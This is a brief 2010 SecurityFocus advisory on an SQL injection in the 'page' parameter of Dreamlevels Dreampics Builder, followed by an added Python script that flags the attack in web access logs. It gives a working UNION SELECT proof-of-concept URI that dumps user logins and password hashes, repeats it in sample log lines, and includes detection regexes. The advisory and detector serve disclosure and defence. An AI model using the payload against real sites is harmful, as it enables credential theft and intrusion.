Dreamlevels Dreampics Builder 'page' Parameter SQL Injection Vulnerability

An attacker can exploit this issue with a browser.

The following proof-of-concept URI is available:

http://www.example.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--
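
A detection sketch for the request shown above, added here as an example (it is not part of the advisory or of the vendor's code): it scans web access log lines for `page` values that are not plain integers and flags the UNION-based pattern. It assumes `page` is meant to be a non-negative integer index and that logs use the combined format; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: 'page' is meant to be a small non-negative integer index.
INT_RE = re.compile(r"[0-9]{1,6}")
# Tokens typical of the UNION-based pattern shown in the advisory's URI.
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|--|/\*|\bconcat(_ws)?\s*\(", re.I | re.S)
# Request line inside a combined-format access log entry.
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_page_value(value):
    """Return 'ok', 'non_integer' or 'sqli' for one URL-decoded value."""
    if INT_RE.fullmatch(value):
        return "ok"
    if SQLI_RE.search(value):
        return "sqli"
    return "non_integer"

def scan_log(lines, param="page"):
    """Return [(line_no, verdict, decoded_value)] for suspicious requests."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qsl percent-decodes and turns '+' into a space, so encoded
        # and plain variants of the same payload classify identically.
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key.lower() != param:
                continue
            verdict = classify_page_value(value)
            if verdict != "ok":
                findings.append((no, verdict, value))
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /demo/photosite/?page=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] "GET /demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users-- HTTP/1.1" 200 4891',
    '192.0.2.44 - - [01/Jan/2010:10:00:09 +0000] "GET /demo/photosite/?page=%2D2%20UNION%20SELECT%20null HTTP/1.1" 200 4890',
    '192.0.2.77 - - [01/Jan/2010:10:01:00 +0000] "GET /demo/photosite/?page=abc HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for no, verdict, value in scan_log(SAMPLE_LOG):
        print(f"line {no}: {verdict}: {value!r}")
```

The same strict integer check, applied server-side before the value reaches the query, rejects the request outright; parameterized queries remain the actual fix.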


 

Copyright 2010, SecurityFocus